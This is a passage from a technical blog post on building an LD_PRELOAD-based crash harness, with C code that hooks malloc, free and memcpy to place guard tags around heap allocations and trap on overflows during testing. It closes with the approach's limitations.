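    f = fdopen(fd, "wb");
    if (f == NULL) {
        close(fd);
        unlink(tmpl);
        return -1;
    }

    ok = fwrite(data, 1, len, f) == len;
    if (fclose(f) != 0)  /* also closes fd; reports flush errors */
        ok = 0;
    if (!ok) {
        unlink(tmpl);
        return -1;
    }

    memcpy(path_out, tmpl, sizeof(tmpl));
    return 0;
}
```

The resulting path could then be formatted into the LD_PRELOAD=... string in place of a fixed path, and unlinked once the target has exited.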

Instrumentation Payload (Shared Object)

At this point, I had a crash harness capable of pre-loading a shared object into the debuggee and monitoring the debuggee for crashes. Next, I focused on developing the shared object itself, which gets injected into the debuggee to hook libc imports and profile memory. I started by writing functions with the same names and prototypes as the libc imports I wanted to hook. Remember, the harness executes the target program with LD_PRELOAD, which tells the dynamic linker to load this shared object before libc.so (and any other library). Because the dynamic linker finds the pre-loaded shared object's definitions first, it fills in the global offset table with the addresses of its versions of the hooked functions. As such, when the program calls malloc, it executes the pre-loaded shared object's malloc, which reserves 8 bytes of additional memory at the beginning and end of the allocation to hold tags (a known sequence of random bytes). It does this by adding 16 bytes to the size argument before calling the real libc:malloc, whose address it looks up with dlsym(RTLD_NEXT, ...) using the following macro:

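/* RTLD_NEXT is a GNU extension: define _GNU_SOURCE before any #include */
#define _GNU_SOURCE
#include <dlfcn.h>

/* Resolve the next definition of `name` after this library (normally
 * libc's) once and cache it in `sym`. FAIL() is the library's error
 * handler (not shown). do/while(0) makes the macro act as one statement. */
#define LOAD_SYM(sym, type, name) do {      \
    if (!sym) {                             \
        sym = (type)dlsym(RTLD_NEXT, name); \
        if (!sym)                           \
            FAIL();                         \
    }                                       \
} while (0)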

When libc:malloc returns, my malloc writes an 8-byte tag at the beginning and end of the allocation and stores metadata about the tagged allocation in a global linked list. It then advances the returned pointer by 8 bytes (past the start tag) and returns it to the target program. My free does the reverse: it walks the linked list to check whether the pointer belongs to a tagged allocation. If it does, it moves the pointer back 8 bytes and calls libc:free to release the allocation properly.
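A minimal sketch of the tagging scheme just described. The names tagged_malloc, tagged_free, tagged_live_count and struct tagged_alloc, and the fixed k_tag bytes, are hypothetical; in the pre-loaded library the first two would be exported as malloc and free and would call the real implementations resolved with LOAD_SYM, while this standalone version calls libc directly so it can run on its own.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define TAG_SIZE 8

/* Assumption: a fixed tag for illustration; the post describes a known
 * sequence of random bytes. */
static const unsigned char k_tag[TAG_SIZE] =
    { 0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe };

/* Metadata for one tagged allocation. */
struct tagged_alloc {
    unsigned char *base;        /* pointer returned by the real malloc */
    size_t size;                /* size requested by the program */
    struct tagged_alloc *next;
};

static struct tagged_alloc *g_allocs;  /* global list (not thread-safe) */

/* Would be exported as `malloc`; malloc/free below stand in for the real
 * libc functions (the list nodes must also bypass the hook). */
void *tagged_malloc(size_t size)
{
    struct tagged_alloc *rec;
    unsigned char *base;

    if (size > SIZE_MAX - 2 * TAG_SIZE)
        return NULL;
    base = malloc(size + 2 * TAG_SIZE);  /* room for both tags */
    if (base == NULL)
        return NULL;
    rec = malloc(sizeof(*rec));
    if (rec == NULL) {
        free(base);
        return NULL;
    }

    memcpy(base, k_tag, TAG_SIZE);                    /* start tag */
    memcpy(base + TAG_SIZE + size, k_tag, TAG_SIZE);  /* end tag */

    rec->base = base;
    rec->size = size;
    rec->next = g_allocs;
    g_allocs = rec;

    return base + TAG_SIZE;  /* the program sees only the bytes between tags */
}

/* Would be exported as `free`; untagged pointers go straight to free. */
void tagged_free(void *ptr)
{
    struct tagged_alloc **link;

    if (ptr == NULL)
        return;

    for (link = &g_allocs; *link != NULL; link = &(*link)->next) {
        struct tagged_alloc *rec = *link;
        if (rec->base + TAG_SIZE == (unsigned char *)ptr) {
            *link = rec->next;  /* unlink the record */
            free(rec->base);    /* free from the start tag */
            free(rec);
            return;
        }
    }
    free(ptr);
}

/* Number of tagged allocations still live. */
size_t tagged_live_count(void)
{
    size_t n = 0;
    for (struct tagged_alloc *rec = g_allocs; rec != NULL; rec = rec->next)
        n++;
    return n;
}
```

Offsetting by 8 bytes leaves the returned pointer only 8-byte aligned, while glibc's malloc guarantees 16-byte alignment on x86-64; a 16-byte tag would preserve that guarantee. A complete hook would also need calloc and realloc wrappers, since libc's realloc cannot handle a pointer that sits 8 bytes into a block.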

In addition to malloc and free, the pre-loaded shared object also hooks copy imports such as memcpy, strncpy, and more. My memcpy calls libc:memcpy and then walks the global linked list of tagged allocations, checking whether any tag has been altered. If one has, the pre-loaded library deliberately crashes the program by executing an illegal instruction, which causes the crash harness to emit a crash dump.
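The check performed after each hooked copy might look like the following sketch. The names checked_memcpy, tags_intact and struct tagged_alloc and the fixed tag bytes are hypothetical, and the list head is passed in explicitly to keep the example self-contained. __builtin_trap() is a GCC/Clang builtin that compiles to ud2 on x86-64, raising the SIGILL that a harness can catch.

```c
#include <stddef.h>
#include <string.h>

#define TAG_SIZE 8

/* Assumption: a fixed tag for illustration; the post uses random bytes. */
static const unsigned char k_tag[TAG_SIZE] =
    { 0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe };

/* Metadata for one tagged allocation: [tag][size user bytes][tag]. */
struct tagged_alloc {
    unsigned char *base;
    size_t size;
    struct tagged_alloc *next;
};

/* Returns 1 if both tags around the allocation are unchanged, else 0. */
int tags_intact(const struct tagged_alloc *rec)
{
    return memcmp(rec->base, k_tag, TAG_SIZE) == 0 &&
           memcmp(rec->base + TAG_SIZE + rec->size, k_tag, TAG_SIZE) == 0;
}

/* Would be exported as `memcpy`. Inside that hook the copy must go through
 * the real memcpy resolved with LOAD_SYM, or the call would recurse. */
void *checked_memcpy(void *dst, const void *src, size_t n,
                     const struct tagged_alloc *head)
{
    void *ret = memcpy(dst, src, n);

    /* Scan every tagged allocation after the copy */
    for (const struct tagged_alloc *rec = head; rec != NULL; rec = rec->next) {
        if (!tags_intact(rec))
            __builtin_trap();  /* illegal instruction -> SIGILL */
    }
    return ret;
}
```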

Conclusion

There are many limitations to this approach. For example, dynamic memory can be modified without calling any imported function. If that happens and a tag is corrupted, the instrumentation library will not detect it until the program next calls a hooked import. Moreover, an out-of-bounds (OOB) write that lands before the start tag or after the end tag, without touching either tag, goes unnoticed; unless it causes further memory corruption or an access violation, the program keeps running. Also, the LD_PRELOAD trick does not work for statically linked programs, and some dynamic linkers (such as Android's) don't support it. Limitations aside, this approach can be adapted for other use cases, such as visualizing heaps or altering a program's execution for debugging purposes, and it can be combined with other binary instrumentation techniques.

All code described in this blog post is contained in my crash harness, ich, which can be found here. Thank you for reading!